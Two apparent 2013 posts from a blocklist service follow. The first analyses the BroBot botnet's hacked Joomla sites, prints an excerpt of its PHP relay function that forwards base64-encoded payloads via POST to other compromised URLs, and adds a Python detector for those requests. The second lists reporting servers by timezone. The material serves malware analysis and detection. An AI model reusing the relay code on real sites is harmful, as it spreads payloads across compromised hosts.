2013
03.22

Over the last few days, the BroBot runners have started a new wave and are sending POST requests with a c_id parameter to the hacked sites.

The data (base64-encoded) contains the following script/data:

[Image: brobot-runners]

 

In each POST request, the script calls 140 to 180 other hacked URLs:

[Image: brobot-runners2]

 


....
function send($target){
    forkill();
    if(strpos($target,$_SERVER["SERVER_NAME"]) !== false){
        global $code;
    } else {
        $code = $_REQUEST["c_id"];
    }
    if(!preg_match("/http/i",$target))
        $target = "http://$target";
    $parts = @parse_url($target);
    $host = $parts["host"];
    $path = $parts["path"];
    if($path=="")$path="/";
    $data = @http_build_query(array("c_id" => $code ,'gnu[]' => 'base64_decode', "fr" => $_REQUEST["fr"], "ksess" => $_REQUEST["ksess"]));
    $request = "POST $path HTTP/1.1\r\n"
        ."Host: $host\r\n"
        ."User-Agent: Mozilla/5.0 Firefox/3.6.12\r\n"
        ."Accept: */*\r\n"
        ."Accept-Language: en-us,en;q=0.5\r\n"
        ."Accept-Encoding: deflate\r\n"
        ."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
        ."Content-type: application/x-www-form-urlencoded\r\n"
        ."Content-Length: ".strlen($data)."\r\n"
        ."Connection: Close\r\n"
        ."Cache-Control: no-cache\r\n\r\n{$data}";
    forkill();
    $fp = @fsockopen($host, 80);
    @stream_set_timeout($fp, 3000);
    @fwrite($fp, $request);
    @stream_set_blocking($fp, 0);
    return $fp;
}
if((isset($_REQUEST["rf"]) && $_REQUEST["rf"] == 1) || $_REQUEST["fr"] == 1){
    echo @implode("", @file(writabledir()."/res"."2eb7e37x28e"));
    @unlink(writabledir()."/res"."2ebx839d1fb28e");
    flush();
}
$fn = lock();
....
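
A defensive check built from the request that send() assembles in the excerpt above (an added example, not part of the original post or of the BroBot code): it parses a raw HTTP request and lists which of the excerpt's fixed headers and form fields it carries. The function names, the 64-character length threshold and both sample requests are constructed assumptions.

```python
import base64
from urllib.parse import parse_qs, urlencode

# Header values hard-coded in the send() excerpt above.
RELAY_HEADERS = {
    "user-agent": "Mozilla/5.0 Firefox/3.6.12",
    "accept-encoding": "deflate",
    "accept-charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7",
}
MIN_C_ID_LEN = 64  # assumption: a base64-encoded script is far longer than a normal id

def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into method, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    first, *rest = head.decode("latin-1").split("\r\n")
    headers = {n.strip().lower(): v.strip()
               for n, sep, v in (line.partition(":") for line in rest) if sep}
    return first.split(" ", 1)[0].upper(), headers, body.decode("latin-1")

def is_base64(value: str) -> bool:
    try:
        return bool(base64.b64decode(value, validate=True)) and len(value) >= MIN_C_ID_LEN
    except ValueError:  # binascii.Error is a ValueError subclass
        return False

def relay_indicators(raw: bytes) -> list:
    """Return which traits of the excerpt's relay request are present in `raw`."""
    method, headers, body = parse_request(raw)
    if method != "POST":
        return []
    hits = [f"header:{k}" for k, v in RELAY_HEADERS.items() if headers.get(k) == v]
    if "application/x-www-form-urlencoded" in headers.get("content-type", "").lower():
        form = parse_qs(body, keep_blank_values=True)
        if "base64_decode" in form.get("gnu[]", []):
            hits.append("param:gnu[]=base64_decode")
        if any(is_base64(v) for v in form.get("c_id", [])):
            hits.append("param:c_id-is-base64")
    return hits

def build(headers: dict, body: str) -> bytes:
    """Assemble a constructed sample request (not captured traffic)."""
    head = "".join(f"{k}: {v}\r\n" for k, v in headers.items())
    return (f"POST /index.php HTTP/1.1\r\nHost: site.example\r\n{head}"
            f"Content-Type: application/x-www-form-urlencoded\r\n\r\n{body}").encode()

PLACEHOLDER = base64.b64encode(b"constructed placeholder, not a real payload " * 2).decode()
RELAY_SAMPLE = build(RELAY_HEADERS, urlencode({"c_id": PLACEHOLDER, "gnu[]": "base64_decode"}))
BENIGN_SAMPLE = build({"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/19.0",
                       "Accept-Encoding": "gzip, deflate"}, "user=alice&c_id=42")
```

Each header on its own is weak evidence, so treat the returned list as a score: the gnu[]=base64_decode field together with a long base64 c_id is the combination specific to this excerpt.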

 

We have currently found 3357 URLs with hacked Joomla installations/sites.

Over 2,500 scripts/URLs are online. In the coming days, we plan to report the sites to Bank of America or directly to the hoster so that they can be checked and fixed.

In the coming days we will analyse the complete PHP code and write a little about what is not good and could be made better 🙂

If you want to get the complete code, please contact us.

2013
03.19

The Servers which send Reports to blocklist and their Timezones/Locations

We currently have the following servers with the following timezones (locations):

Count Timezone (Order by Count, desc):

662 Europe/Berlin
29 Europe/London
26 Europe/Amsterdam
25 Europe/Zurich
18 Europe/Vienna
18 Europe/Paris
15 Europe/Rome
13 Europe/Copenhagen
11 GMT+0000
10 America/Los_Angeles
8 America/New_York
7 Europe/Madrid
5 Europe/Helsinki
5 America/Chicago
4 Pacific/Auckland
4 America/Toronto
4 Asia/Kolkata
3 Asia/Vientiane
3 Asia/Tehran
3 Australia/Sydney
3 Europe/Moscow
3 Europe/Prague
2 Europe/Riga
2 America/Phoenix
2 Europe/Bratislava
2 Australia/Brisbane
2 Asia/Manila
2 Asia/Jakarta
1 Europe/Istanbul
1 Europe/Bucharest
1 Australia/Hobart
1 Europe/Luxembourg
1 America/Mexico_City
1 Europe/Lisbon
1 America/Montreal
1 Europe/Ljubljana
1 Asia/Bangkok
1 Asia/Shanghai
1 America/Denver
1 Europe/Warsaw
1 Asia/Singapore
1 Asia/Hong_Kong
1 Europe/Volgograd
1 America/Sao_Paulo
1 Europe/Kiev
1 Asia/Brunei
1 Europe/Athens

 

Count Timezone (Order by Timezone asc):

 

5 America/Chicago
1 America/Denver
10 America/Los_Angeles
1 America/Mexico_City
1 America/Montreal
8 America/New_York
2 America/Phoenix
1 America/Sao_Paulo
4 America/Toronto
1 Asia/Bangkok
1 Asia/Brunei
1 Asia/Hong_Kong
2 Asia/Jakarta
4 Asia/Kolkata
2 Asia/Manila
1 Asia/Shanghai
1 Asia/Singapore
3 Asia/Tehran
3 Asia/Vientiane
2 Australia/Brisbane
1 Australia/Hobart
3 Australia/Sydney
26 Europe/Amsterdam
1 Europe/Athens
662 Europe/Berlin
2 Europe/Bratislava
1 Europe/Bucharest
13 Europe/Copenhagen
5 Europe/Helsinki
1 Europe/Istanbul
1 Europe/Kiev
1 Europe/Lisbon
1 Europe/Ljubljana
29 Europe/London
1 Europe/Luxembourg
7 Europe/Madrid
3 Europe/Moscow
18 Europe/Paris
3 Europe/Prague
2 Europe/Riga
15 Europe/Rome
18 Europe/Vienna
1 Europe/Volgograd
1 Europe/Warsaw
25 Europe/Zurich
11 GMT+0000
4 Pacific/Auckland

 

Old servers which have no location/timezone, or never send reports from a service which has no timezone in the logs, are not listed here.
